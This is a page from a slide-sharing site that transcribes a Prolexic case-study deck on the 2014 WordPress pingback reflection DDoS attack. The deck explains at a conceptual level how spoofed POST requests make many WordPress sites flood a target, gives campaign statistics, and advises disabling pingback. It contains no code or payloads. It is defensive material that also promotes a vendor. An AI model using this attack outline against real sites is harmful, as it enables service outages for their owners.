D do s attack case study wordpress pingback reflection attack prolexic podcast

6,656 views

Published on

http://bit.ly/1pBadhD | The WordPress pingback function can be abused in powerful reflection attacks to flood a victim site with connections. Learn how this attack vector works and what you need to do to prevent your sites from participating in these attacks in the full Prolexic Q1 2014 DDoS attack report, available for a free download at http://bit.ly/1pBadhD.

Published in: Business, Technology
  • Be the first to comment

D do s attack case study wordpress pingback reflection attack prolexic podcast

  1. 1. www.prolexic.com Case Study: A Reflected Application DDoS Attack WordPress Pingback
  2. 2. Overview • PLXsert has observed abuse of the WordPress pingback function in recent DDoS attack campaigns • This reflected application attack vector exploits a vulnerability in WordPress function • WordPress applied fixes to prevent this attack, but reflection techniques still allow DDoS attackers to abuse it
  3. 3. Characteristics of the WordPress pingback attack • Pingback is an automated function that notifies the website admin when their posts or docs are linked by other websites • Attackers abuse this by crafting pingback requests that redirect the responses to the target of the malicious actor • This attack relies on the use of many victim WordPress websites with the pingback function turned on
  4. 4. Characteristics of the WordPress pingback attack (cont) • During an attack, hundreds of thousands of victim WordPress sites could be abused to generate pingback requests to the target site • The attack vector succeeds by exhausting the number of connections to the target site, overwhelming the target with bandwidth floods
  5. 5. How does the WordPress pingback attack work? • Malicious actors send custom POST requests to an intermediary WordPress site • These POST requests are spoofed appearing to come from target site • Pingback response is then reflected back at the target
  6. 6. Actual campaign from Q1 2014 • One campaign targeting an Internet media company peaked at 50,000 connections per second and lasted nearly 9 hours • This attack was based entirely on the WordPress pingback vector
  7. 7. Traffic distribution of real attack
  8. 8. Pingback best practices – The WordPress pingback attack is not new, but has recently regained popularity – Administrators are strongly encouraged to disable this pingback feature – However, many WordPress sites cannot afford to abandon this feature, and there may be no alternative services available – DDoS mitigation in this case is a daunting task – but well managed by specialized mitigation providers such as Prolexic
  9. 9. Q1 2014 Global Attack Report • Download the Q1 2014 Global DDoS Attack Report • The Q1 2014 report covers: – Detection rules for WordPress pingback attacks – Analysis of recent DDoS attack trends – Breakdown of average Gbps/Mpps statistics – Year-over-year and quarter-by-quarter analysis – Types and frequency of application layer attacks – Types and frequency of infrastructure attacks – Trends in attack frequency, size and sources – Where and when DDoSers launch attacks – Case study and analysis
  10. 10. About Prolexic • Prolexic Technologies, now part of Akamai, has successfully stopped DDoS attacks for more than a decade • Our global DDoS mitigation network and 24/7 security operations center (SOC) can stop even the largest attacks that exceed the capabilities of other DDoS mitigation service providers

×